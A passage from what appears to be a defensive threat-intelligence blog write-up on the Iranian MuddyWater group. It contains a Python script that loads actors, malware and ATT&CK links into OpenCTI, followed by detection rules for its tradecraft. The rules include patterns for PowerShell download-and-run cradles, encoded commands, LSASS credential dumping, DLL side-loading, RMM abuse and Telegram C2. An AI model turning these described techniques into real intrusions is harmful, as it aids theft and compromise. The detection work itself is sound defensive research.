object reference so each report is queryable from the actor page.</p><p><strong>Step 7 — ATT&amp;CK pattern links from procedures.yaml.</strong> Iterates all attck_candidates across the 10 procedure records and creates MuddyWater → uses → ATT&amp;CK technique relationships. If the MITRE connector has not yet synced a technique, the script creates a stub Attack Pattern object (with x_mitre_id set) and flags it for enrichment. This prevents the import from failing on a timing issue between the connector sync and the import run.</p><p>The script is <strong>idempotent</strong>: every object lookup uses a read() before create(). Re-running after a partial failure or after the MITRE connector syncs simply confirms existing objects and fills in any gaps.</p><pre>#!/usr/bin/env python3<br>"""<br>Desert Hydra — Phase 3 OpenCTI graph import.Reads data/sources.yaml and data/procedures.yaml and creates:<br>  - Identity:       Iran MOIS (organization)<br>  - Intrusion Set:  MuddyWater (with all known aliases)<br>  - Malware:        actor-developed tools (9 objects)<br>  - Tool:           legitimate tools abused (4 objects)<br>  - Reports:        one per promoted source (up to 20)<br>  - Relationships:  attributed-to, uses (malware/tool/ATT&amp;CK)<br>Idempotent - existing objects are not duplicated.<br>ATT&amp;CK pattern links are skipped for techniques not yet synced by the<br>MITRE connector; re-run the script after the MITRE sync completes.<br>Usage:<br>    export OPENCTI_URL=http://localhost:8080<br>    export OPENCTI_TOKEN=&lt;admin-token&gt;<br>    python3 tools/opencti_import.py<br>"""<br>import os<br>import sys<br>import yaml<br>from pathlib import Path<br>from pycti import OpenCTIApiClient<br>from pycti.entities.opencti_identity import IdentityTypes<br># ── Bootstrap ─────────────────────────────────────────────────────────────────<br>OPENCTI_URL   = os.environ.get("OPENCTI_URL",   "http://localhost:8080")<br>OPENCTI_TOKEN = os.environ.get("OPENCTI_TOKEN", "")<br>REPO_ROOT     = Path(__file__).resolve().parent.parent<br>if not OPENCTI_TOKEN:<br>    sys.exit("ERROR: set OPENCTI_TOKEN environment variable")<br>api = OpenCTIApiClient(url=OPENCTI_URL, token=OPENCTI_TOKEN, log_level="error")<br>print(f"[desert-hydra] Connected  {OPENCTI_URL}")<br># ── Load YAML data ─────────────────────────────────────────────────────────────<br>with open(REPO_ROOT / "data" / "sources.yaml") as f:<br>    SOURCES = yaml.safe_load(f)["sources"]<br>with open(REPO_ROOT / "data" / "procedures.yaml") as f:<br>    PROCEDURES = yaml.safe_load(f)["procedures"]<br>print(f"[desert-hydra] Loaded {len(SOURCES)} sources, {len(PROCEDURES)} procedures")<br># ── TLP:WHITE ─────────────────────────────────────────────────────────────────<br>def get_tlp_white():<br>    results = api.marking_definition.list(<br>        filters={<br>            "mode": "and",<br>            "filters": [{"key": "definition", "values": ["TLP:WHITE"]}],<br>            "filterGroups": [],<br>        }<br>    )<br>    if results:<br>        return results[0]["id"]<br>    obj = api.marking_definition.create(<br>        definition_type="TLP",<br>        definition="TLP:WHITE",<br>        x_opencti_color="#ffffff",<br>        x_opencti_order=0,<br>    )<br>    return obj["id"]<br>TLP_WHITE = get_tlp_white()<br># ── Helpers ───────────────────────────────────────────────────────────────────<br>def _find(accessor, name):<br>    """Look up a STIX object by name. Returns the object dict or None."""<br>    return accessor.read(<br>        filters={<br>            "mode": "and",<br>            "filters": [{"key": "name", "values": [name]}],<br>            "filterGroups": [],<br>        }<br>    )<br><br>def link(from_id, to_id, rel_type, confidence=80):<br>    """Create a STIX core relationship; silently skip if it already exists."""<br>    try:<br>        api.stix_core_relationship.create(<br>            fromId=from_id,<br>            toId=to_id,<br>            relationship_type=rel_type,<br>            confidence=confidence,<br>            objectMarking=[TLP_WHITE],<br>        )<br>    except Exception:<br>        pass<br><br>ATTCK_NAMES = {<br>    "T1574.002": "DLL Side-Loading",<br>    "T1574.001": "DLL Search Order Hijacking",<br>    "T1546.015": "Component Object Model Hijacking",<br>    "T1218.010": "Regsvr32",<br>}<br>def find_or_create_attack_pattern(mitre_id):<br>    """Look up an ATT&amp;CK pattern by x_mitre_id. Create stub if not synced yet."""<br>    result = api.attack_pattern.read(<br>        filters={<br>            "mode": "and",<br>            "filters": [{"key": "x_mitre_id", "values": [mitre_id]}],<br>            "filterGroups": [],<br>        }<br>    )<br>    if result:<br>        return result["id"], False<br>    name = ATTCK_NAMES.get(mitre_id, mitre_id)<br>    obj = api.attack_pattern.create(<br>        name=name,<br>        x_mitre_id=mitre_id,<br>        description=f"MITRE ATT&amp;CK technique {mitre_id}. Created as stub pending MITRE connector sync.",<br>        objectMarking=[TLP_WHITE],<br>        confidence=75,<br>    )<br>    return obj["id"], True<br># ── Step 1: Iran MOIS Identity ────────────────────────────────────────────────<br>existing = _find(api.identity, "Iran MOIS")<br>if existing:<br>    MOIS_ID = existing["id"]<br>else:<br>    obj = api.identity.create(<br>        type=IdentityTypes.ORGANIZATION.value,<br>        name="Iran MOIS",<br>        description=(<br>            "Iranian Ministry of Intelligence and Security (MOIS). "<br>            "State sponsor attributed to MuddyWater cyber operations by CISA, FBI, "<br>            "CNMF, NCSC-UK, and NSA in joint advisory AA22-055A (February 2022)."<br>        ),<br>        objectMarking=[TLP_WHITE],<br>        confidence=85,<br>    )<br>    MOIS_ID = obj["id"]<br># ── Step 2: MuddyWater Intrusion Set ──────────────────────────────────────────<br>existing = _find(api.intrusion_set, "MuddyWater")<br>if existing:<br>    MW_ID = existing["id"]<br>else:<br>    obj = api.intrusion_set.create(<br>        name="MuddyWater",<br>        aliases=[<br>            "Seedworm", "Mango Sandstorm", "TA450",<br>            "Static Kitten", "TEMP.Zagros", "Mercury", "DEV-1084",<br>        ],<br>        description=(<br>            "Iranian MOIS subordinate threat group active since at least 2017. "<br>            "Targets government, defense, telecom, oil and gas, and MSPs globally. "<br>            "Significant focus on Israeli organizations since 2022. Known for "<br>            "spearphishing, RMM tool abuse, and a shift toward in-house tooling "<br>            "(BugSleep, AnchorRAT) beginning ~May 2024."<br>        ),<br>        resource_level="government",<br>        primary_motivation="espionage",<br>        confidence=85,<br>        objectMarking=[TLP_WHITE],<br>        createdBy=MOIS_ID,<br>    )<br>    MW_ID = obj["id"]<br>link(MW_ID, MOIS_ID, "attributed-to", 85)<br># ── Step 3: Malware catalog ────────────────────────────────────────────────────<br>MALWARE_CATALOG = [<br>    {"name": "POWERSTATS",  "aliases": ["Powermud"],   "description": "MuddyWater first-stage PowerShell backdoor (MITRE S0223)."},<br>    {"name": "PowGoop",     "aliases": ["Goopdate"],   "description": "DLL loader hijacking GoogleUpdate.exe via side-loading (MITRE S1046)."},<br>    {"name": "Small Sieve", "aliases": [],             "description": "Python backdoor compiled as NSIS; Telegram Bot API C2; OutlookMicrosift Run key."},<br>    {"name": "Canopy",      "aliases": ["Starwhale"],  "description": "Excel-macro dropper; startup folder persistence; HTTP POST C2."},<br>    {"name": "Mori",        "aliases": [],             "description": "DNS-tunneling backdoor deployed as FML.dll via regsvr32.exe."},<br>    {"name": "BugSleep",    "aliases": [],             "description": "In-house backdoor (2024); 43-minute scheduled task; shellcode injection."},<br>    {"name": "AnchorRAT",   "aliases": [],             "description": "Custom RAT (2024); COM hijacking persistence (T1546.015)."},<br>    {"name": "SyncroRAT",   "aliases": [],             "description": "RMM-based RAT; Technion campaign (Feb 2023); Log4j initial access."},<br>    {"name": "DarkBit",     "aliases": [],             "description": "Ransomware/wiper; Technion attack; vssadmin shadow copy deletion."},<br>]<br>MALWARE_IDS = {}<br>for m in MALWARE_CATALOG:<br>    existing = _find(api.malware, m["name"])<br>    if existing:<br>        MALWARE_IDS[m["name"]] = existing["id"]<br>    else:<br>        obj = api.malware.create(<br>            name=m["name"], aliases=m["aliases"],<br>            description=m["description"], is_family=False,<br>            objectMarking=[TLP_WHITE], createdBy=MOIS_ID,<br>        )<br>        MALWARE_IDS[m["name"]] = obj["id"]<br># ── Step 4: Tool catalog ──────────────────────────────────────────────────────<br>TOOL_CATALOG = [<br>    {"name": "AteraAgent",  "aliases": ["Atera RMM"], "description": "Commercial RMM abused for persistent remote access via phishing."},<br>    {"name": "SimpleHelp",  "aliases": [],            "description": "Commercial RMM abused in 2024 Israeli targeting."},<br>    {"name": "Mimikatz",    "aliases": [],            "description": "LSASS credential dumping (T1003.001), used with procdump64.exe."},<br>    {"name": "LaZagne",     "aliases": [],            "description": "LSA secrets (T1003.004) and cached domain credential dumping (T1003.005)."},<br>]<br>TOOL_IDS = {}<br>for t in TOOL_CATALOG:<br>    existing = _find(api.tool, t["name"])<br>    if existing:<br>        TOOL_IDS[t["name"]] = existing["id"]<br>    else:<br>        obj = api.tool.create(<br>            name=t["name"], aliases=t["aliases"],<br>            description=t["description"],<br>            objectMarking=[TLP_WHITE], createdBy=MOIS_ID,<br>        )<br>        TOOL_IDS[t["name"]] = obj["id"]<br># ── Step 5: uses relationships ────────────────────────────────────────────────<br>for mid in MALWARE_IDS.values():<br>    link(MW_ID, mid, "uses", 80)<br>for tid in TOOL_IDS.values():<br>    link(MW_ID, tid, "uses", 80)<br># ── Step 6: Reports from sources.yaml ────────────────────────────────────────<br>SOURCE_DATES = {<br>    "src_usgov_aa22_055a_pdf_mirror":        "2022-02-24T00:00:00.000Z",<br>    "src_incd_muddywater_darkbit_2023":      "2023-02-07T00:00:00.000Z",<br>    "src_incd_muddywater_2024_evolution":    "2024-06-01T00:00:00.000Z",<br>    "src_cisa_aa22_055a_page":               "2022-02-24T00:00:00.000Z",<br>    "src_ncsc_uk_muddywater_joint_advisory": "2022-02-24T00:00:00.000Z",<br>    "src_incd_recent_phishing_1947":         "2024-09-01T00:00:00.000Z",<br>    "src_mitre_attack_muddywater_g0069":     "2024-01-01T00:00:00.000Z",<br>}<br>REPORT_IDS = {}<br>for src in SOURCES:<br>    src_id   = src["id"]<br>    title    = src["title"]<br>    pub_date = SOURCE_DATES.get(src_id, "2023-01-01T00:00:00.000Z")<br>    confidence = 85 if src.get("source_reliability") == "A" else 70<br>    description = (<br>        f"Publisher: {src['publisher']}\n"<br>        f"Reliability: {src.get('source_reliability','?')} / "<br>        f"Credibility: {src.get('information_credibility','?')}\n"<br>        f"URL: {src['url']}\n"<br>        f"Actor claims: {', '.join(src.get('actor_claims', []))}\n"<br>        f"ATT&amp;CK candidates: {', '.join(src.get('candidate_attck_techniques', []))}"<br>    )<br>    existing = _find(api.report, title)<br>    if existing:<br>        REPORT_IDS[src_id] = existing["id"]<br>    else:<br>        obj = api.report.create(<br>            name=title, published=pub_date,<br>            description=description,<br>            report_types=["threat-report"],<br>            confidence=confidence,<br>            objectMarking=[TLP_WHITE],<br>            createdBy=MOIS_ID,<br>            objects=[MW_ID],<br>        )<br>        REPORT_IDS[src_id] = obj["id"]<br># ── Step 7: ATT&amp;CK pattern links from procedures ──────────────────────────────<br>linked, stubs = set(), []<br>for proc in PROCEDURES:<br>    for candidate in proc.get("attck_candidates", []):<br>        tid = candidate["technique"]<br>        if tid in linked:<br>            continue<br>        pattern_id, created_as_stub = find_or_create_attack_pattern(tid)<br>        link(MW_ID, pattern_id, "uses", 75)<br>        linked.add(tid)<br>        if created_as_stub:<br>            stubs.append(tid)<br># ── Summary ───────────────────────────────────────────────────────────────────<br>print(f"Import complete - malware: {len(MALWARE_IDS)}, tools: {len(TOOL_IDS)}, "<br>      f"reports: {len(REPORT_IDS)}, ATT&amp;CK links: {len(linked)}, stubs: {len(stubs)}")<br></pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*WMvnfWfF50hj3Rk60DBAxA.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*XMTEbgDPokzU9iTK3sjEww.png"></figure><p><strong>Result:</strong> All objects created. Re-run confirms idempotency (no duplicates).</p><h4>Step 13: Intrusion Set Verification</h4><p><strong>Result:</strong> MuddyWater entity with all aliases, Iran MOIS attribution relationship, campaign links, and malware/tool associations confirmed in OpenCTI.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*5KWUHIP3nkUhF6wpQpDa3g.png"></figure><h4>Step 14: Knowledge Graph</h4><p><strong>Result:</strong> Graph shows MuddyWater → 9 malware, 4 tools, 3 campaigns, 21 ATT&amp;CK techniques — all with source-annotated relationship edges.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*-B2D00HhbhmdA5rtGm7klA.png"></figure><h4>Step 15: ATT&amp;CK Matrix Coverage</h4><p><strong>Result:</strong> 21 techniques highlighted across 8 tactics in the ATT&amp;CK Enterprise matrix.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*4XphzS2vtf-peVJ-ArTglg.png"></figure><h4>Step 16: BugSleep Malware Detail</h4><p><strong>Result:</strong> BugSleep malware object with INCD 2024 source annotation, T1053.005 relationship (43-minute task), and C2 technique links confirmed.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*3rt63a6jCO_-fk-BLdyaTw.png"></figure><h4>Step 17: Reports List</h4><p><strong>Result:</strong> 20 report objects, one per promoted source. Each report links to the procedures and techniques it evidences.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*-Ej71hGDspW3ahdqZWATAA.png"></figure><h4>Step 19: OpenCTI Dashboard</h4><p><strong>Result:</strong> Custom dashboard showing technique frequency heatmap by source tier — highest-corroborated techniques visible at a glance.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*_HccHBJxzb-ZZu93WImMhg.png"></figure><h3>Phase 4: Detection Atlas</h3><p>The detection atlas is the core analytical output. Each of the 11 detection records in <a href="https://github.com/anpa1200/operation-desert-hydra/blob/main/data/detections.yaml">data/detections.yaml</a> contains:</p><ul><li>The specific MuddyWater behavior it targets (not the ATT&amp;CK technique category)</li><li>Required log sources and capability gates</li><li>Multi-rule pseudologic (SIEM-agnostic — works as a template for Sigma, KQL, SPL, or any rule format)</li><li>False positive classes and tuning guidance</li><li>A creation_logic field explaining <em>why</em> the rule is designed this way — the design decision, not just what the rule does</li></ul><p>Coverage scores follow a strict scale: <strong>5</strong> = lab-validated with a Kibana screenshot. <strong>4</strong> = correlated analytic (good logic, single source or partial lab). <strong>3</strong> = behavioral detection with partial validation. A score of 5 requires a proof, not just passing pseudologic.</p><p><strong>Step 20 — Analyst Review</strong></p><p>Before any detection went to validation, every record went through a review pass that checked: operator precedence in multi-clause conditions, access mask completeness for LSASS detection, path allowlist accuracy for the GoogleUpdate/Goopdate IoC, and ATT&amp;CK technique coverage gaps. The review fixed a real operator precedence bug in det_mw_0010 Rule B where the command_line clause was outside the event_type guard, tightened the LSASS access mask set, improved T1033 coverage in det_mw_0009 Rule C via Win32_ComputerSystem, and added the x86/x64 Google installation path allowlist to det_mw_0004 Rule A.</p><h4>det_mw_0001 — Email Delivery Correlated with Process Spawn</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/796/1*ycAoCbrkdxo6oxx4X0Gkhw.png"></figure><p><em>Techniques: T1566.001, T1566.002 · Score: 5 (lab-validated)</em></p><p><strong>What it targets:</strong> MuddyWater delivers malicious content three ways — ZIP or Office macro attachments, links to Egnyte/OneDrive delivering RMM installers, and emails from compromised accounts. Corroborated by CISA AA22–055A, INCD 2023, and INCD 2024. The highest-priority initial access vector in the dataset.</p><p><strong>Why it’s built this way:</strong> Email delivery alone is not a detection signal — MuddyWater’s phishing emails are indistinguishable from legitimate mail at the gateway layer. The detection value comes from correlating delivery with a process spawn on the recipient endpoint within a tight 5-minute window. The parent process constraint (Outlook, browser) is the key limiter: it restricts scope to email-triggered or link-triggered execution, which is exactly the documented delivery chain. Both attachment-based and link-based delivery methods are covered because all variants are source-confirmed. The correlated logic type reflects that neither event alone is sufficient — only the combination is meaningful.</p><p><strong>Required telemetry:</strong> Email gateway or SEG with attachment metadata and URL extraction. EDR or Sysmon Event ID 1 with parent image and command line. Without the gateway telemetry, this detection degrades to parent-process heuristics only and loses the delivery-correlation value.</p><pre>event_type IN [email_delivery] AND<br>  (attachment.extension IN ["zip","xlsx","xlsm","pdf","docm"] OR<br>   link.domain IN ["egnyte.com","onedrive.live.com","1drv.ms"])<br>CORRELATE WITHIN 300 seconds WITH<br>event_type IN [process_create] WHERE<br>  parent_image IN ["OUTLOOK.EXE","chrome.exe","firefox.exe","msedge.exe"] AND<br>  image IN ["powershell.exe","cmd.exe","wscript.exe","mshta.exe",<br>            "AteraAgent.exe","ScreenConnect.exe","SimpleHelp.exe","rport.exe"]</pre><p><strong>Key false positives:</strong> Legitimate macro-enabled Office files from internal users. IT-approved RMM tools deployed via email links during onboarding. Tune by excluding known sender domains and approved RMM deployment windows.</p><h4>det_mw_0002 — Web Service Spawning Interpreter Shell</h4><p><em>Techniques: T1190 · Score: 5 (lab-validated)</em></p><p><strong>What it targets:</strong> MuddyWater uses public-facing exploitation as a secondary initial access vector — CVE-2020–0688 (Exchange), CVE-2020–1472 (Netlogon/Zerologon), CVE-2021–44228 (Log4j), and unspecified VPN vulnerabilities from INCD 2024.</p><p><strong>Why it’s built this way:</strong> The detection targets the post-exploitation moment — a web service spawning a shell — rather than the exploit payload itself. This is deliberately CVE-agnostic: it fires on CVE-2020–0688, CVE-2020–1472, Log4j, and any unnamed VPN vulnerability without needing individual exploit signatures. The parent process list maps directly to the documented CVEs: w3wp.exe covers Exchange and IIS, java.exe covers Log4j, lsass.exe covers Netlogon exploitation leading to SYSTEM-level shell creation. The SYSTEM integrity level filter is the key noise reducer — legitimate administrative scripts rarely run at SYSTEM under IIS application pools without a clear documented reason.</p><p><strong>Required telemetry:</strong> EDR or Sysmon Event ID 1 with full parent-child chain and integrity level. IDS/IPS for CVE-specific signatures as a complementary layer.</p><pre>event_type = process_create AND<br>parent_image IN ["w3wp.exe","java.exe","lsass.exe","services.exe",<br>                 "vmtoolsd.exe","vpnagent.exe"] AND<br>image IN ["cmd.exe","powershell.exe","wscript.exe","cscript.exe","bash.exe"] AND<br>(parent_user IN ["NETWORK SERVICE","IIS_IUSRS","SYSTEM"] OR<br> integrity_level = "System")</pre><p><strong>Key false positives:</strong> Legitimate administrative scripts under IIS application pools. Java-based monitoring agents that spawn processes. Tune by process hash allowlisting for known-good management tools.</p><h4>det_mw_0003 — PowerShell Encoded Command and Script Obfuscation</h4><p><em>Techniques: T1059.001, T1027 · Score: 5 (lab-validated)</em></p><p><strong>What it targets:</strong> PowerShell obfuscation is a cross-cutting technique present in every MuddyWater tool tier — PowGoop (Base64 C2 setup), POWERSTATS (IEX + web request for stage delivery), and the 2024 lure campaigns (embedded API key executed via PowerShell). Three distinct usage patterns across tools required three rules.</p><p><strong>Why it’s built this way:</strong> Each rule targets a different MuddyWater PowerShell pattern with a different telemetry requirement.</p><p>Rule A targets PowGoop and POWERSTATS loader delivery. The regex \s-e[a-zA-Z]*\s+[A-Za-z0-9+/=]{50,} is deliberately written to match all unambiguous prefix forms of -EncodedCommand (-e, -ec, -en, -enc) while the 50-character minimum for the Base64 blob avoids matching the -Encoding parameter. This is the operator precision that matters: -Encoding UTF8 would otherwise match a naive regex.</p><p>Rule B targets POWERSTATS script execution behavior: IEX combined with a web request. This is the decoded content layer — it requires Script Block Logging (Event ID 4104), which is the capability gate that determines whether this detection class exists at all in a given environment.</p><p>Rule C is the delivery-context fallback: PowerShell spawned by an Office application, email client, or browser has no legitimate explanation in a standard enterprise environment and fires regardless of whether Script Block Logging is enabled.</p><p><strong>Required telemetry:</strong> Script Block Logging (Event ID 4104) — required for Rule B and for the highest-fidelity version of this detection. Sysmon Event ID 1 for Rules A and C. Without Script Block Logging, the detection degrades to command-line heuristics only.</p><pre># Rule A — Encoded command flag (all prefix forms: -e, -ec, -en, -enc ...)<br>event_type = process_create AND<br>image ENDSWITH "powershell.exe" AND<br>command_line IMATCHES "\s-e[a-zA-Z]*\s+[A-Za-z0-9+/=]{50,}"</pre><pre># Rule B — Script Block content (Event ID 4104)<br>event_type = script_block_log AND<br>script_block_text MATCHES "(IEX|Invoke-Expression|InvokeScript)" AND<br>script_block_text MATCHES "(WebClient|Invoke-WebRequest|DownloadString|Net\.Http)"</pre><pre># Rule C — Suspicious parent process<br>event_type = process_create AND<br>image ENDSWITH "powershell.exe" AND<br>parent_image IN ["OUTLOOK.EXE","winword.exe","excel.exe",<br>                 "chrome.exe","firefox.exe","msedge.exe","WScript.exe"]</pre><p><strong>Key false positives:</strong> Administrative scripts using -EncodedCommand for special characters. SCCM/Ansible deployments running Base64-encoded payloads. Baseline known-good encoded commands by hash before alerting on Rule A.</p><h4>det_mw_0004 — Unsigned DLL Loaded by Signed Executable</h4><p><em>Techniques: T1574.002 · Score: 3 (behavioral, partial validation)</em></p><p><strong>What it targets:</strong> PowGoop’s execution method — a malicious DLL renamed Goopdate.dll placed alongside GoogleUpdate.exe, causing the legitimate signed binary to load it. Confirmed in 2024 toolset by INCD 2024.</p><p><strong>Why it’s built this way:</strong> Two rules serve different confidence tiers. Rule A is sourced directly from the documented PowGoop technique: the specific process name (GoogleUpdate.exe), DLL name (Goopdate.dll), and the fact that any path outside the Google installation directories is anomalous. The allowlist covers both x86 and x64 installation paths because omitting either creates a bypass. This combination — specific binary, specific DLL name, path outside expected directory — is near-unique and fires with high precision. Rule B is the generic behavioral net for future DLL side-loading variants where the actor may use different binary names — it trades precision for coverage against toolset evolution.</p><p>Score is 3 (not 5) because the lab’s stub DLL did not produce sufficient Sysmon EID 7 signal during validation. The detection logic is sound; the telemetry dependency (Sysmon image load events with signing status) is the constraint.</p><p><strong>Required telemetry:</strong> Sysmon Event ID 7 (ImageLoad) with signed/unsigned status — this is the hard dependency. Without it, DLL loads are invisible to SIEM-based detection.</p><pre># Rule A — Specific IoC: GoogleUpdate loading Goopdate from non-Google path<br>event_type = image_load AND<br>image ENDSWITH "GoogleUpdate.exe" AND<br>loaded_image ENDSWITH "Goopdate.dll" AND<br>NOT (loaded_image_path STARTSWITH "C:\Program Files (x86)\Google\" OR<br>     loaded_image_path STARTSWITH "C:\Program Files\Google\")</pre><pre># Rule B — Generic: signed process loading unsigned DLL from user-writable path<br>event_type = image_load AND<br>process_signed = true AND<br>loaded_image_signed = false AND<br>loaded_image_path MATCHES "(\\Users\\|\\AppData\\|\\Temp\\|\\ProgramData\\)"</pre><p><strong>Key false positives:</strong> Third-party software shipping unsigned DLLs alongside signed executables (common). Developer workstations with locally compiled DLLs. Rule B requires environment-specific tuning before production deployment.</p><h4>det_mw_0005 — Registry Run Key and Startup Folder Persistence</h4><p><em>Techniques: T1547.001 · Score: 5 (lab-validated)</em></p><p><strong>What it targets:</strong> Multiple MuddyWater malware families use Run key persistence with actor-specific value names. Small Sieve: OutlookMicrosift (deliberate typo mimicking Microsoft). AA22-055A documents a second key: SystemTextEncoding. Canopy installs a WSF script in the startup folder — a sub-technique that doesn't appear as a Run key write.</p><p><strong>Why it’s built this way:</strong> Three rules cover three distinct persistence mechanisms across the malware catalog. Rule A is an exact-match IoC alert on the two named value names — it fires immediately on any match without needing path or parent context, because these specific strings have no legitimate usage in a standard enterprise environment. Rule B is the behavioral safety net for unknown or renamed values: path heuristic (AppData/Temp) combined with a non-installer parent covers the common pattern of malware writing its own persistence without using an installer. The process_integrity_level filter removes high-integrity (admin-level) processes from the behavioral rule because legitimate software installers typically run elevated. Rule C is added specifically to cover Canopy's startup folder WSF persistence, which doesn't show up as a Run key write at all — it's a file creation event.</p><p><strong>Required telemetry:</strong> Sysmon Event ID 13 (registry value set) for Rules A and B. Sysmon Event ID 11 (file create) for Rule C.</p><pre># Rule A — Specific IoC: known MuddyWater Run key value names<br>event_type = registry_set AND<br>registry_key MATCHES "\\CurrentVersion\\Run" AND<br>registry_value_name IN ["OutlookMicrosift","SystemTextEncoding"]<br><br><br># Rule B - Behavioral: Run key pointing to writable/unusual path<br>event_type = registry_set AND<br>registry_key MATCHES "(HKCU|HKLM)\\.*\\CurrentVersion\\Run" AND<br>registry_value_data MATCHES "(\\AppData\\|\\Temp\\|\\ProgramData\\|\\Users\\)" AND<br>process_image NOT IN ["msiexec.exe","setup.exe","install.exe","update.exe"] AND<br>process_integrity_level NOT IN ["High","System"]<br># Rule C - Script files written to startup folder (covers Canopy WSF)<br>event_type = file_create AND<br>file_path MATCHES "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" AND<br>file_extension IN ["wsf","vbs","js","ps1","bat","cmd"]</pre><p><strong>Key false positives:</strong> Rule A has essentially zero false positives on the specific value names. Rule B requires installer process exclusion — the list is environment-specific. Rule C may fire on legitimate startup scripts deployed by IT via Group Policy; exclude by file hash or signer.</p><h4>det_mw_0006 — Scheduled Task with 43-Minute Beacon Interval</h4><p><em>Techniques: T1053.005 · Score: 4 (correlated analytic)</em></p><p><strong>What it targets:</strong> BugSleep creates a Windows scheduled task triggered every 43 minutes for C2 beaconing — a specific behavioral fingerprint documented in the INCD 2024 report. The interval is documented as customizable, but 43 minutes is the observed operational value.</p><p><strong>Why it’s built this way:</strong> The 43-minute interval is the single most precise artifact in the entire procedure dataset. Rule A is designed as a high-fidelity immediate alert requiring no tuning: PT43M is the ISO 8601 duration format for 43 minutes and appears verbatim in the Windows Task XML. This fires with near-zero false positives because no legitimate software uses a 43-minute repeat interval for any standard purpose. Rule B generalizes the pattern for future BugSleep variants that may use a different interval: short repetition (under 60 minutes) combined with a task action pointing to a user-writable path is anomalous regardless of exact interval. Rule C is the telemetry fallback — many environments do not forward Task Scheduler event logs to SIEM, but schtasks.exe process creation (Sysmon EID 1) is more commonly collected and captures the command line.</p><p>Score is 4 (not 5) because this is a single-source procedure — INCD 2024 only. Before treating Rule A as a high-confidence production alert, corroborate with a second vendor source.</p><p><strong>Required telemetry:</strong> Windows Security Event ID 4698 (scheduled task created) or Task Scheduler operational log for Rules A and B. Sysmon Event ID 1 for Rule C.</p><pre># Rule A — Specific: 43-minute interval (BugSleep artifact) — immediate alert<br>event_type = scheduled_task_created AND<br>task_trigger_repetition_interval = "PT43M"<br><br># Rule B - Behavioral: short interval + suspicious action path<br>event_type = scheduled_task_created AND<br>task_trigger_repetition_interval_minutes &lt; 60 AND<br>task_action_path MATCHES "(\\AppData\\|\\Temp\\|\\ProgramData\\|\\Users\\)" AND<br>creating_process NOT IN ["svchost.exe","taskeng.exe","msiexec.exe"]<br># Rule C - Sysmon command line fallback<br>event_type = process_create AND<br>image ENDSWITH "schtasks.exe" AND<br>command_line MATCHES "/create" AND<br>command_line MATCHES "(AppData|Temp|ProgramData)"</pre><p><strong>Key false positives:</strong> Backup and monitoring software creating frequent tasks. Browser update mechanisms. Rule B requires interval baseline per environment before production deployment.</p><h4>det_mw_0007 — RMM Tool Executed from User-Writable Path</h4><p><em>Techniques: T1219 · Score: 5 (lab-validated)</em></p><p><strong>What it targets:</strong> RMM tool abuse is the most consistently documented MuddyWater technique across all source tiers — five independent government and vendor sources corroborate it. Tool inventory across campaigns: ScreenConnect (2022), SyncroRAT (Israel 2023), rport.exe (DarkBit operation), AteraAgent (multiple sources), SimpleHelp, Level, PDQConnect (2024).</p><p><strong>Why it’s built this way:</strong> RMM tool detection is inherently a context problem. The binary is legitimate. The network traffic to vendor infrastructure is legitimate. Only the delivery chain and execution path are anomalous. Three rules address this from different angles.</p><p>Rule A uses path as the primary signal: a legitimately IT-deployed RMM tool installs to Program Files or a managed path, not AppData/Temp/Downloads. A known RMM binary executing from a user-writable path means it was delivered, not installed by IT.</p><p>Rule B uses parent process as the signal: no legitimate RMM deployment is spawned by Outlook, a browser, or an archive utility. This is the delivery-context constraint — if an RMM binary’s parent is OUTLOOK.EXE, the delivery chain is phishing regardless of what the binary is.</p><p>Rule C uses network destination: RMM infrastructure connections from endpoints with no authorized RMM deployment are anomalous. Rules A+C together — RMM binary from writable path plus outbound connection to vendor domain — form the highest-confidence combined signal.</p><p><strong>The baseline prerequisite is non-negotiable.</strong> Rule C without a baseline of authorized RMM deployments per endpoint generates constant noise in any environment that legitimately uses RMM tools. This is the single highest-ROI detection in the dataset if the baseline is clean.</p><p><strong>Required telemetry:</strong> EDR or Sysmon Event ID 1 with parent image and file path. Network flow or proxy logs with process name attribution for Rule C.</p><pre># Rule A — Known RMM binary from non-standard installation path<br>event_type = process_create AND<br>(image ENDSWITH "AteraAgent.exe" OR<br> image ENDSWITH "ScreenConnect.exe" OR<br> image ENDSWITH "SimpleHelp.exe" OR<br> image ENDSWITH "rport.exe" OR<br> image ENDSWITH "SyncroRAT.exe" OR<br> image ENDSWITH "Level.exe" OR<br> image ENDSWITH "PDQConnect.exe") AND<br>image_path MATCHES "(\\AppData\\|\\Temp\\|\\Downloads\\|\\Users\\[^\\]+\\Desktop\\)"<br><br># Rule B - RMM binary spawned by email client or browser<br>event_type = process_create AND<br>(image ENDSWITH "AteraAgent.exe" OR image ENDSWITH "ScreenConnect.exe" OR<br> image ENDSWITH "SimpleHelp.exe" OR image ENDSWITH "rport.exe") AND<br>parent_image IN ["OUTLOOK.EXE","outlook.exe","chrome.exe","firefox.exe",<br>                 "msedge.exe","7zFM.exe","WinRAR.exe","explorer.exe"]<br># Rule C - Outbound connection to RMM vendor infrastructure from unexpected endpoint<br>event_type = network_connection AND<br>destination_domain MATCHES "(atera\.com|screenconnect\.com|simplehelp\.net|syncromsp\.com)" AND<br>source_process NOT IN [known_rmm_processes_baseline]</pre><p><strong>Key false positives:</strong> All RMM tools are legitimate software — the entire detection depends on delivery context and path. Authorized deployments must be baselined per endpoint before any rule produces useful signal. Help desk technicians installing RMM from their downloads folder will match Rule A; exclude by user account or machine type.</p><h4>det_mw_0008a — Non-Browser Process Connecting to Telegram Bot API</h4><p><em>Techniques: T1071.001, T1102 · Score: 3 (behavioral, partially validated)</em></p><p><strong>What it targets:</strong> Small Sieve beacons exclusively via the Telegram Bot API (api.telegram.org) over HTTPS. This is one of the most specific C2 channels documented for MuddyWater — a fixed, known hostname with no CDN rotation.</p><p><strong>Why it’s built this way:</strong> The detection is single-rule because the signal is specific enough not to need graduated fallbacks. api.telegram.org is a fixed hostname. The discriminating condition is not the domain but the process: in enterprise environments where Telegram is not a standard application, any process connecting to this endpoint is anomalous. The approach is deliberately 